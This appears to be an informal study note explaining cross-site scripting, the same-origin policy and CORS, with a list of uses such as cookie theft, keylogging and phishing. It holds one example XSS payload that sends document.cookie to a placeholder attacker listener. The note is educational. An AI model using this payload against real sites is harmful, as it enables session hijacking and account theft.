XSS is a code injection attack that allows and attacker to execute malicious code in another users browser.
Possible leverages
- Cookie Theft : Accessing cookie using
document.cookieand sending it to a attacker listener using something like<script> window.location='http://url/?cookie=' + document.cookie </script> - Keylogging : Registering a keylogger with addEventListener & sending infos to own server
- Phishing : Showing a fake login form to steal credentials
XSS is largely used to circumvent the same origin policy, so its relevant to talk about SOP
Same origin policy :
Origin -> protocol + hostname(included subdomain) + port
Same origin policy dictates how a document/script loaded by one origin interacts with a resource from another origin.
It restricts page A from accessing data from page B - information embedded on pages DOM i.e. Bank statements on a bank website.
SOP dont restrict images,css,js etc
Same origin policy can be relaxed using some methods, one of which is CORS (cross origin resource sharing).
CORS : If the owners at https://bar.other wishes to restrict data access to only requests from https://foo.example, they would send on the header of allowed webpages :
Access-Control-Allow-Origin : https://foo.example
So data will only be served upon request from https://foo.example
Before same origin policy, if you logged into bankA.com from your device and then visited attacker.com, this malicious website could send a request to bankA.com, the browser would send the cookies by default with the request, thus authorizing the login, then the malicious website could parse the data and steal sensitive credentials.
But with the same origin policy, a website could no longer access data from a different origin.
Where XSS really shines is, request is sent by a malicious script within the security context of bankA.com, and later sent to attacker.com . So learning XSS is really exploiting any existing vulnerabilities to inject malicious scripts.